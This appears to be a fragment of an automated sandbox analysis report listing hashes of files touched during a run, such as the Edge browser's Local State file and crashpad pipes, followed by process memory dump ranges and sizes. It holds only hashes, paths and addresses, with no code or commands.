SHA2563f1e64f276b1e72e0c63deed7f03828c400624e3b91f3c6d73e34012492858c5
SHA51273f5771d672e5243f80c820fcfcbee741dabcf1ffb633106eac695fe19cc1de986913501b4643ede30118e914eef24fbe6de08d24b579e7ee5cd6fc45bcb2420
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD56d55901933eb93d50753237ca8d8b2a9
SHA115b5642a456c63c6bc1c94282a176b88166a104c
SHA256b87ab91b4c884c04b1a74268893d0ef7a4af92c5dee8a113c3266f5e2a01c2b2
SHA51250d543c940c7d35ffbdca56ed6d12864432b17b651751659c7970e8e6ac0880494657687842fa1fe895c2dd28289086763c772bd3ac55995bae99a3b14f5d6b8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD52303ea8c6ba101bb3327f65d654603a2
SHA1a3561fbb005e222c732ed5bcc18df980b6d1ffc6
SHA2566d752d25aa2a201fc1ff8e3ac3ddaecf525dfbf29b8e343096dcc19d06b92e6c
SHA512453630e0107f3bb498db16478867fdb4b7b946a2ad9d99d62d4955d56d83d0503c6882b1814c1af3e28898efe68eac972a886515f1393a6b2ef7e7b979fa09f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD5fb37da1a0c63fad655849b861e76d1d5
SHA1bf7ab5134a6a026b53dabf434129150ed877d8cc
SHA2566b15c04cd82a85f653fbcdbe7bf3a4d185eaf7412cc17ce8aab500350c291d2d
SHA512eb3ae0518452b6da3c5510b154d2601a7f7ec9805a1e63c41f564eab6b8e707601617954f51a39e3be86400d1efbd706314a9f6b8b1e3d5b1758c49b700bc16d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD52303ea8c6ba101bb3327f65d654603a2
SHA1a3561fbb005e222c732ed5bcc18df980b6d1ffc6
SHA2566d752d25aa2a201fc1ff8e3ac3ddaecf525dfbf29b8e343096dcc19d06b92e6c
SHA512453630e0107f3bb498db16478867fdb4b7b946a2ad9d99d62d4955d56d83d0503c6882b1814c1af3e28898efe68eac972a886515f1393a6b2ef7e7b979fa09f7
-
\??\pipe\LOCAL\crashpad_1120_PVZSYWGBIFXYODCDMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_1468_OMVUFKPAAXKBCYZJMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_2032_XXIIDCMQVKWWAGDQMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_3484_LHSEHIGLULDFVLLUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4064_FFUXYALHHLCCLYSUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4344_EAYPHIHAKVSCPTKUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4436_USDVDTMVVRRRSYPRMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4596_AFAIVBHDNWWYGYNOMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/176-297-0x0000000005F00000-0x0000000005F12000-memory.dmpFilesize
72KB
-
memory/176-166-0x0000000000B70000-0x0000000000BB4000-memory.dmpFilesize
272KB
-
memory/176-299-0x00000000061A0000-0x00000000061DC000-memory.dmpFilesize
240KB
-
memory/176-152-0x0000000000000000-mapping.dmp
-
memory/480-351-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/480-357-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/480-358-0x00007FF9E0D30000-0x00007FF9E0F25000-memory.dmpFilesize
2.0MB
-
memory/480-353-0x00007FF9E0C30000-0x00007FF9E0CEE000-memory.dmpFilesize
760KB
-
memory/480-352-0x00007FF9E0D30000-0x00007FF9E0F25000-memory.dmpFilesize
2.0MB
-
memory/480-350-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/480-349-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1120-148-0x0000000000000000-mapping.dmp
-
memory/1152-348-0x00007FF9E0C30000-0x00007FF9E0CEE000-memory.dmpFilesize
760KB
-
memory/1152-346-0x00007FF9E0D30000-0x00007FF9E0F25000-memory.dmpFilesize
2.0MB
-
memory/1152-342-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/1152-356-0x00007FF9E0C30000-0x00007FF9E0CEE000-memory.dmpFilesize
760KB
-
memory/1152-355-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/1152-354-0x00007FF9E0D30000-0x00007FF9E0F25000-memory.dmpFilesize
2.0MB
-
memory/1156-181-0x0000000000000000-mapping.dmp
-
memory/1256-324-0x0000000000000000-mapping.dmp
-
memory/1468-131-0x0000000000000000-mapping.dmp
-
memory/1544-180-0x0000000000000000-mapping.dmp
-
memory/2032-143-0x0000000000000000-mapping.dmp
-
memory/2184-278-0x0000000000000000-mapping.dmp
-
memory/2356-339-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/2356-338-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/2356-337-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/2356-336-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/2532-132-0x0000000000000000-mapping.dmp
-
memory/3164-290-0x0000000000000000-mapping.dmp
-
memory/3468-150-0x0000000000000000-mapping.dmp
-
memory/3484-130-0x0000000000000000-mapping.dmp
-
memory/3492-295-0x0000000000000000-mapping.dmp
-
memory/3628-319-0x0000000000400000-0x0000000000736000-memory.dmpFilesize
3.2MB
-
memory/3628-315-0x0000000000400000-0x0000000000736000-memory.dmpFilesize
3.2MB
-
memory/3628-313-0x0000000000000000-mapping.dmp
-
memory/3688-321-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/3688-314-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/3688-311-0x0000000000000000-mapping.dmp
-
memory/3688-327-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/3688-312-0x0000000000AB0000-0x0000000001146000-memory.dmpFilesize
6.6MB
-
memory/3692-343-0x0000000003A00000-0x0000000004028000-memory.dmpFilesize
6.2MB
-
memory/3692-347-0x0000000004840000-0x000000000485E000-memory.dmpFilesize
120KB
-
memory/3692-341-0x0000000000F40000-0x0000000000F76000-memory.dmpFilesize
216KB
-
memory/3692-345-0x00000000041A0000-0x0000000004206000-memory.dmpFilesize
408KB
-
memory/3692-344-0x0000000003970000-0x0000000003992000-memory.dmpFilesize
136KB
-
memory/4064-146-0x0000000000000000-mapping.dmp
-
memory/4104-186-0x0000000000000000-mapping.dmp
-
memory/4204-138-0x0000000000000000-mapping.dmp
-
memory/4344-140-0x0000000000000000-mapping.dmp
-
memory/4356-144-0x0000000000000000-mapping.dmp
-
memory/4436-133-0x0000000000000000-mapping.dmp
-
memory/4572-301-0x0000000000000000-mapping.dmp
-
memory/4596-137-0x0000000000000000-mapping.dmp
-
memory/4672-300-0x0000000000000000-mapping.dmp
-
memory/4704-302-0x0000000000000000-mapping.dmp
-
memory/4712-298-0x0000000004D00000-0x0000000004E0A000-memory.dmpFilesize
1.0MB
-
memory/4712-170-0x0000000000330000-0x0000000000374000-memory.dmpFilesize
272KB
-
memory/4712-167-0x0000000000000000-mapping.dmp
-
memory/4836-134-0x0000000000000000-mapping.dmp
-
memory/4888-141-0x0000000000000000-mapping.dmp
-
memory/4944-147-0x0000000000000000-mapping.dmp
-
memory/4988-135-0x0000000000000000-mapping.dmp
-
memory/5080-229-0x0000000060900000-0x0000000060992000-memory.dmpFilesize
584KB
-
memory/5080-155-0x0000000000000000-mapping.dmp
-
memory/5180-185-0x0000000000000000-mapping.dmp
-
memory/5200-340-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/5204-190-0x0000000000000000-mapping.dmp
-
memory/5224-192-0x0000000000000000-mapping.dmp
-
memory/5232-191-0x0000000000000000-mapping.dmp
-
memory/5240-193-0x0000000000000000-mapping.dmp
-
memory/5248-195-0x0000000000000000-mapping.dmp
-
memory/5256-286-0x0000000000000000-mapping.dmp
-
memory/5500-282-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/5500-194-0x0000000000000000-mapping.dmp
-
memory/5500-279-0x00000000022B0000-0x00000000022C6000-memory.dmpFilesize
88KB
-
memory/5520-334-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/5520-333-0x0000000000000000-mapping.dmp
-
memory/5520-199-0x0000000000000000-mapping.dmp
-
memory/5536-207-0x0000000000000000-mapping.dmp
-
memory/5544-213-0x0000000000000000-mapping.dmp
-
memory/5552-201-0x0000000000000000-mapping.dmp
-
memory/5560-203-0x0000000000000000-mapping.dmp
-
memory/5568-204-0x0000000000000000-mapping.dmp
-
memory/5588-200-0x0000000000000000-mapping.dmp
-
memory/5764-202-0x0000000000000000-mapping.dmp
-
memory/5836-292-0x0000000000000000-mapping.dmp
-
memory/6012-320-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/6012-318-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/6012-316-0x0000000000000000-mapping.dmp
-
memory/6012-317-0x000002899D810000-0x000002899D832000-memory.dmpFilesize
136KB
-
memory/6036-281-0x0000000000000000-mapping.dmp
-
memory/6188-328-0x00007FF68EAF0000-0x00007FF68EE6B000-memory.dmpFilesize
3.5MB
-
memory/6188-326-0x0000000000000000-mapping.dmp
-
memory/6188-330-0x00007FF68EAF0000-0x00007FF68EE6B000-memory.dmpFilesize
3.5MB
-
memory/6200-284-0x0000000000000000-mapping.dmp
-
memory/6308-332-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/6308-335-0x0000020979800000-0x0000020979812000-memory.dmpFilesize
72KB
-
memory/6308-331-0x0000020977150000-0x00000209775F6000-memory.dmpFilesize
4.6MB
-
memory/6364-222-0x0000000000000000-mapping.dmp
-
memory/6396-270-0x0000000000000000-mapping.dmp
-
memory/6448-252-0x0000000000903000-0x0000000000914000-memory.dmpFilesize
68KB
-
memory/6448-258-0x00000000001E0000-0x00000000001EF000-memory.dmpFilesize
60KB
-
memory/6448-224-0x0000000000000000-mapping.dmp
-
memory/6448-288-0x00000000001E0000-0x00000000001EF000-memory.dmpFilesize
60KB
-
memory/6448-293-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/6448-287-0x0000000000903000-0x0000000000914000-memory.dmpFilesize
68KB
-
memory/6448-268-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/6456-225-0x0000000000000000-mapping.dmp
-
memory/6632-272-0x0000000000000000-mapping.dmp
-
memory/6680-248-0x0000000000000000-mapping.dmp
-
memory/6680-255-0x0000000000A70000-0x0000000000A90000-memory.dmpFilesize
128KB
-
memory/6800-257-0x0000000000BA0000-0x0000000000BC0000-memory.dmpFilesize
128KB
-
memory/6800-304-0x0000000005780000-0x00000000057E6000-memory.dmpFilesize
408KB
-
memory/6800-251-0x0000000000000000-mapping.dmp
-
memory/6800-310-0x0000000008900000-0x0000000008E2C000-memory.dmpFilesize
5.2MB
-
memory/6956-307-0x0000000005B70000-0x0000000005B8E000-memory.dmpFilesize
120KB
-
memory/6956-259-0x0000000000000000-mapping.dmp
-
memory/6956-309-0x0000000006AB0000-0x0000000006C72000-memory.dmpFilesize
1.8MB
-
memory/6956-303-0x00000000060E0000-0x0000000006684000-memory.dmpFilesize
5.6MB
-
memory/6956-266-0x0000000000660000-0x0000000000680000-memory.dmpFilesize
128KB
-
memory/6956-305-0x00000000053A0000-0x0000000005432000-memory.dmpFilesize
584KB
-
memory/6956-308-0x0000000006890000-0x00000000068E0000-memory.dmpFilesize
320KB
-
memory/6956-296-0x0000000005510000-0x0000000005B28000-memory.dmpFilesize
6.1MB
-
memory/6956-306-0x0000000005440000-0x00000000054B6000-memory.dmpFilesize
472KB
-
memory/7004-329-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/7004-322-0x0000000000000000-mapping.dmp
-
memory/7004-323-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/7004-325-0x00007FF9BE280000-0x00007FF9BED41000-memory.dmpFilesize
10.8MB
-
memory/7012-276-0x0000000000000000-mapping.dmp
-
memory/7056-263-0x0000000000000000-mapping.dmp